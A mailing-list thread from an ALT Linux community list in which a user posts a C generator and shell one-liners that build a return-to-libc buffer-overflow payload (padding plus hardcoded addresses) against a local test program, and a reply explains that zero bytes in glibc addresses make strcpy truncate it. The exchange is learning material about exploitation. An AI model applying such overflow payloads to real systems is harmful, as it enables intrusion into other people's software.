[Comm-en] System call via buffer overflow not working

[Comm-en] System call via buffer overflow not working

[Aaron McDonald]

Here are the typo fixes from my previous email:

//makehex.c
main() {
        char pad[524];
        int i;
        for (i=0; i < 524; i++)
                pad[i] = 'A';
        pad[524]='\0';

        printf("%s\xe0\x9e\x16\x00\xAA\xAA\xAA\xAA\x73\xfb\xff\xbf", pad);
}

./vulner1 $(perl -e 'print "A"x524')$(printf

"\xec\x83\x04\x08\xAA\xAA\xAA\xAA\x73\xfb\xff\xbf")
	or
./vulner1 $(./makehex)	 //don't forget to update and recompile makehex

Re: [Comm-en] System call via buffer overflow not working

[Egor Grebnev]

Aaron,

A small comment from Dmitry Levin, a lead developer who isn't subscribed 
to this mailing list yet.

I hope that the original meaning hasn't been lost during translation 
from Russian ;-)

The technique that you are trying to master is called return-to-libc. It 
is a bit more complex since in the string view the function addresses 
from our glibc are zero bytes. As a result, strcpy in your sample only 
copies a part of the string, and the sample doesn't work.

You can make a Google search on this topic, many things were written 
about it some time ago.

Aaron McDonald wrote:

> Here are the typo fixes from my previous email:
>
> //makehex.c
> main() {
>        char pad[524];
>        int i;
>        for (i=0; i < 524; i++)
>                pad[i] = 'A';
>        pad[524]='\0';
>
>        printf("%s\xe0\x9e\x16\x00\xAA\xAA\xAA\xAA\x73\xfb\xff\xbf", pad);
> }
>
> ./vulner1 $(perl -e 'print "A"x524')$(printf
>
> "\xec\x83\x04\x08\xAA\xAA\xAA\xAA\x73\xfb\xff\xbf")
>     or
> ./vulner1 $(./makehex)     //don't forget to update and recompile makehex
>
>
> _______________________________________________
> Community-en mailing list
> Community-en@altlinux.org
> https://lists.altlinux.org/mailman/listinfo/community-en